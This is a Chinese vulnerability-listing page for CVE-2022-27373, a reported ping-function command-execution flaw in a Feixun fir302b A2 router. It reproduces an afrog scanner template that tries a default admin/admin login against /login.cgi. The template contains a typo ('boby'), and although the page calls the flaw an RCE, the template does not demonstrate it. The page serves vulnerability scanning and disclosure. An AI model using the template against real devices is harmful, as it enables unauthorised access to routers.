CVE-2022-27373: CVE-2022-27373

日期: 2025-09-01 | 影响软件: CVE-2022-27373 | POC: 已公开

漏洞描述

上海飞讯数据通信技术有限公司路由器fir302b A2被发现存在Ping功能远程命令执行（RCE）漏洞。

PoC代码[已公开]

id: CVE-2022-27373
 
info:   
  name: CVE-2022-27373
  author: zhizhuo  
  severity: high    
  verified: true  
  description: |   
   上海飞讯数据通信技术有限公司路由器fir302b A2被发现存在Ping功能远程命令执行（RCE）漏洞。
  reference: 
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27373
 
rules:  
  verify:  
    request:  
      method: POST  
      path: /login.cgi
      boby:
        action_mode=apply&next_page=index.html&current_page=login.html&username=admin&password=YWRtaW4%3D&login=%E7%99%BB%E5%BD%95
    expression: response.status == 200 && response.headers.bcontains(b'index.html') 
expression: verify()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2022/CVE-2022-27373.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446） 无POC

CVE-2022-0342: Zyxel authentication bypass patch analysis POC

CVE-2022-0434: WordPress Page Views Count <2.4.15 - SQL Injection POC

CVE-2022-0540: Atlassian Jira - Authentication bypass in Seraph POC

CVE-2022-0656: uDraw <3.3.3 - Local File Inclusion POC

Webmin /package-updates/update.cgi 命令执行漏洞（CVE-2022-36446）无POC